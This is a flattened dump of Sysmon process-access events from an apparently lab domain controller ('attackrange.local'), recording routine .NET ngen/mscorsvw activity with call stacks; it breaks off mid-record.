14:58:48.856{A7A01FEF-B624-607E-0500-00000000BB01}644760C:\Windows\system32\csrss.exe{A7A01FEF-EC28-607E-E90E-00000000BB01}3180C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000080868Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:48.856{A7A01FEF-EBDF-607E-ED0C-00000000BB01}71206088C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{A7A01FEF-EC28-607E-E90E-00000000BB01}3180C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+3965|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+aafe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a457|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a19d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a055|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+77c6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d26|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9828|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+74ce|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+7395|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2bd9|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8c07|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2130|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f0f|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+29e1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2969|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000080867Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:48.825{A7A01FEF-B625-607E-0C00-00000000BB01}6683532C:\Windows\system32\svchost.exe{A7A01FEF-EC28-607E-E80E-00000000BB01}1428C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000080866Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:48.810{A7A01FEF-B624-607E-0500-00000000BB01}644760C:\Windows\system32\csrss.exe{A7A01FEF-EC28-607E-E80E-00000000BB01}1428C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000080865Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:48.810{A7A01FEF-EBDF-607E-ED0C-00000000BB01}71206088C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{A7A01FEF-EC28-607E-E80E-00000000BB01}1428C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+3965|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+aafe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a457|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a19d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a055|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+77c6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d26|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9828|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+74ce|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+7395|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2bd9|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8c07|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2130|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f0f|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+29e1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2969|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000080864Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:48.763{A7A01FEF-B625-607E-0C00-00000000BB01}6683532C:\Windows\system32\svchost.exe{A7A01FEF-EC28-607E-E70E-00000000BB01}4328C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000080863Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:48.747{A7A01FEF-B624-607E-0500-00000000BB01}6441184C:\Windows\system32\csrss.exe{A7A01FEF-EC28-607E-E70E-00000000BB01}4328C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000080862Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:48.747{A7A01FEF-EBDF-607E-ED0C-00000000BB01}71206088C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{A7A01FEF-EC28-607E-E70E-00000000BB01}4328C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+3965|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+aafe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a457|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a19d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a055|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+77c6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d26|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9828|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+74ce|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+7395|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2bd9|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8c07|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2130|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f0f|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+29e1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2969|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000080861Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:48.700{A7A01FEF-B625-607E-0C00-00000000BB01}6683532C:\Windows\system32\svchost.exe{A7A01FEF-EC28-607E-E60E-00000000BB01}5680C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000080860Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:48.700{A7A01FEF-B624-607E-0500-00000000BB01}644660C:\Windows\system32\csrss.exe{A7A01FEF-EC28-607E-E60E-00000000BB01}5680C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000080859Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:48.700{A7A01FEF-EBDF-607E-ED0C-00000000BB01}71206088C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{A7A01FEF-EC28-607E-E60E-00000000BB01}5680C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+3965|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+aafe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a457|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a19d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a055|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+77c6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d26|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9828|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+74ce|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+7395|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2bd9|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8c07|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2130|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f0f|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+29e1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2969|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000080858Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:48.653{A7A01FEF-B625-607E-0C00-00000000BB01}6683532C:\Windows\system32\svchost.exe{A7A01FEF-EC28-607E-E50E-00000000BB01}1828C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000080857Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:48.638{A7A01FEF-B624-607E-0500-00000000BB01}644760C:\Windows\system32\csrss.exe{A7A01FEF-EC28-607E-E50E-00000000BB01}1828C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000080856Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:48.638{A7A01FEF-EBDF-607E-ED0C-00000000BB01}71206088C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{A7A01FEF-EC28-607E-E50E-00000000BB01}1828C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+3965|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+aafe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a457|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a19d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a055|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+77c6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d26|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9828|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+74ce|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+7395|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2bd9|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8c07|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2130|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f0f|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+29e1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2969|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000080855Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:48.591{A7A01FEF-B625-607E-0C00-00000000BB01}6683532C:\Windows\system32\svchost.exe{A7A01FEF-EC28-607E-E40E-00000000BB01}1628C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000080854Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:48.575{A7A01FEF-B624-607E-0500-00000000BB01}6441184C:\Windows\system32\csrss.exe{A7A01FEF-EC28-607E-E40E-00000000BB01}1628C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000080853Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:48.575{A7A01FEF-EBDF-607E-ED0C-00000000BB01}71206088C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{A7A01FEF-EC28-607E-E40E-00000000BB01}1628C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+3965|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+aafe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a457|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a19d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a055|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+77c6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d26|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9828|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+74ce|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+7395|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2bd9|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8c07|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2130|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f0f|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+29e1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2969|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000080852Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:48.544{A7A01FEF-B625-607E-0C00-00000000BB01}6683532C:\Windows\system32\svchost.exe{A7A01FEF-EC28-607E-E30E-00000000BB01}3104C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000080851Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:48.528{A7A01FEF-B624-607E-0500-00000000BB01}644760C:\Windows\system32\csrss.exe{A7A01FEF-EC28-607E-E30E-00000000BB01}3104C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000080850Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:48.528{A7A01FEF-EBDF-607E-ED0C-00000000BB01}71206088C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{A7A01FEF-EC28-607E-E30E-00000000BB01}3104C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+3965|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+aafe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a457|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a19d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a055|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+77c6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d26|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9828|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+74ce|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+7395|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2bd9|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8c07|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2130|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f0f|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+29e1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2969|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000080849Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:48.481{A7A01FEF-B625-607E-0C00-00000000BB01}6683532C:\Windows\system32\svchost.exe{A7A01FEF-EC28-607E-E20E-00000000BB01}4888C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000080848Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:48.466{A7A01FEF-B624-607E-0500-00000000BB01}644760C:\Windows\system32\csrss.exe{A7A01FEF-EC28-607E-E20E-00000000BB01}4888C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000080847Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:48.466{A7A01FEF-EBDF-607E-ED0C-00000000BB01}71206088C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{A7A01FEF-EC28-607E-E20E-00000000BB01}4888C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+3965|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+aafe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a457|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a19d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a055|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+77c6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d26|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9828|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+74ce|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+7395|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2bd9|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8c07|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2130|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f0f|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+29e1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2969|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x800000000000000080846Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:48.466{A7A01FEF-E38C-607E-860A-00000000BB01}5624NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 